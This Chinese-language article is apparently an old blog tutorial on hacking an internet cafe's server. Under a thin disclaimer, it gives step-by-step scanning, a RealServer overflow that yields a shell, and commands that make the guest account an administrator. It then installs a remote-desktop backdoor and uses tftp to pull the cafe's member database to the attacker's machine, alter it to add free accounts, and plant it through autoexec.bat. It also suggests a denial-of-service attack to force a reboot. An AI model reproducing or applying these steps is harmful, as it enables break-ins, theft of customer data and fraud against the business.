入侵网吧服务器

声明:本文只是告诉你可以这样进入一台网吧服务器,并没有怂恿的意思,任何由本文引起的破坏网吧秩序的行为和作者与作者所在学校无关。本文可自由转载,但请尊重作者版权,保持文章完整。
一直有写些东西的冲动,只是太懒,从前写些在网吧免费上网的东东,现在想想是该换些别的。有些东西放了太久很容易过时的。本文所提及的工具都可以在网上找到。
一、确定目标
首先要确定要攻击的目标,即网吧服务器的IP是多少。我所在网吧的客户机装的是Windows 98+万象2003,估计服务器应该是Windows 2k以上,用Superscan 3.0扫了一下192.168.0.1~192.168.0.254(内部IP)这个范围的135端口,只有一个结果,往服务台瞅了一眼,确实只有一台服务器没有错,目标已经确定。
二、开始入侵
既然服务器开了135端口,那么先用RPC服务缓冲区溢出漏洞溢出工具“RPC Exploit GUI”试试看,选择目标为win2k(ALL)和winxp(ALL)都没有成功,或许是打了补丁,也可能是借助天网防火墙之类的对135端口做了限制。
打开Superscan(本人所用的是3.0版,功能都差不多),扫了一下192.168.0.100(刚才扫出的服务器内部IP地址)的“1~500”端口结果显示服务器开了21(ftp),80(http),135(DCE endpoint resolution),139(NetBIos),445(Microsoft-DS)端口,在IE地址栏内输入

 1<ftp: 192.168.0.100="">(回车)有个共享目录Backup,打开浏览了一遍,东西挺多,只是有个万象2003的安装程序让我不至于太失望。返回Superscan,可以看到结果栏里显示服务器用的是IIS5.1可以确定目标服务器用的是Windows XP,看来用Webdavx溢出XP的机子是没希望了,用X-scan扫描服务器网页,报告发现.idq/.ida映射的溢出漏洞。骗人的。其实对于IIS5.1无效,想过利用X-way穷举目标服务器的密码。但是很费时,我没有太多时间,便放弃了。又试着对服务器的fp30reg.dll进行溢出。由于对方防火墙的阻挡,测试失败。Win98的客户机实在不能利用目标服务器的139端口做什么。用“RPC Exploit GUI”溢出服务器的139、445端口的成功率太低。没什么法子,满着看目标服务器的网站做的如何,随便点了一会儿,是利RealOne播放的在线电影网站,想起来了,real服务不是开了个554(媒体流)端口嘛!刚才用Superscan扫时忘了,现在补充确认一下。再用real服务缓冲区溢出漏洞溢出工具“THCREALbad”试试。这个漏洞不是很著名,管理员或许并不知道,我心里想着,一会儿,提示溢出成功,并要求我连接到其31337端口,我终于看到了曙光,telnet上去,成功得到服务器的shell。先做个账号,这要用到几条命令:(括号内为注解,不要输入)   
 2net user guest/active:yes(启用账户guest)   
 3net user guest 12345(把账户guest的密码设为12345)   
 4net localgroup administrators /add guest(把guest加到administrators组,具有最高权限,默认为Guests组)   
 5由于服务器用的是WinXP,因此映射网络驱动器的方法是不行了,下载TFTPD32并运行(自己去网上找),把本地变成一台FTP服务器,FTP目录设为C盘根目录,下载djxyxs.exe(开3389用的)到C盘根目录(FTP目录设在哪里就下载到哪里)。回到溢出的shell,把djxyxs传到服务器,执行“tftpt -i 192.168.0.50 get djxyxs.exe C:windowssystemdjxyxs.exe(注:192.168.0.50为我所在机),传过来了,再执行“djxyxs”程序,对方的3389端口就要开了(还要重启),后门制作好了以后,来窃取服务器的会员数据库,服务端一般是被装在C盘或D盘的Octopus目录下,执行“tftp -i 192.168.0.50 put Oct2003.mdb c:octopusOct2003.mdb”(注:Oct2003.mdb为万象2003的会员数据库),一盏茶的功夫(视数据库的大小而定)数据库下载过来了,但是怎么打开呢?可以用Excel,但网吧里不会装这种玩意,记得服务器的共享目录Backup里有个万象2003的安装程序(在“百度”搜索“万象2003”可以找到),把它的服务端装到本机D盘根目录,用刚刚下载到C盘的Oct2003.mdb覆盖掉本机“D:Octopus”目录里的空数据库文件,再运行服务端程序“server.exe”可以看到本网吧的所有会员,接下来是自己添加会员,没什么好说的,可别告诉我你不会。再着是要把修改后的数据库文件传回来,由于服务器的服务端是开着的,为避免发生冲突,切不可把修改过的数据库文件直接传到目标的Octopus目录,要换一种方法让服务器在重新启动过程中替换掉那两个文件,方法如下:   
 61、编辑本机的autoexec.bat(在C盘的根目录),删掉所有内容。   
 72、输入以下内容:(括号内为解释,不要输入)   
 8@echo off(关闭屏幕回显)   
 9move c:Oct2003.mdb c:Octopus(将本机C盘的数据库文件替换掉服务器里的数据库文件)   
103、回到服务器的shell,执行“tftp -i 192.168.0.50 get autoexec.bat c:autoexec.bat”(用我们的自启动文件autoexec.bat覆盖掉服务器的autoexec.bat)。   
114、最后是把修改过的数据库文件传到服务器,执行“tftp -i 192.168.0.50 get Oct2003.mdb c:Oct2003.mdb”   
12接下来只需叫管理员把服务器重启一下就可以了(呵呵!管理员会听你的吗?)。XP自带一个重启的命令(Shutdown),我在溢出的shell里执行“shutdown -r”后,提示“权限不够,客户机不能执行重启命令”,算了吧!心急的可以来个拒绝服务攻击。本篇写的确实挺乱的,没有什么技术性可言,仅供一些人参考,写得不好之处欢迎来信赐教:[email protected] 。</ftp:>
Published At
Categories with 网络技术
comments powered by Disqus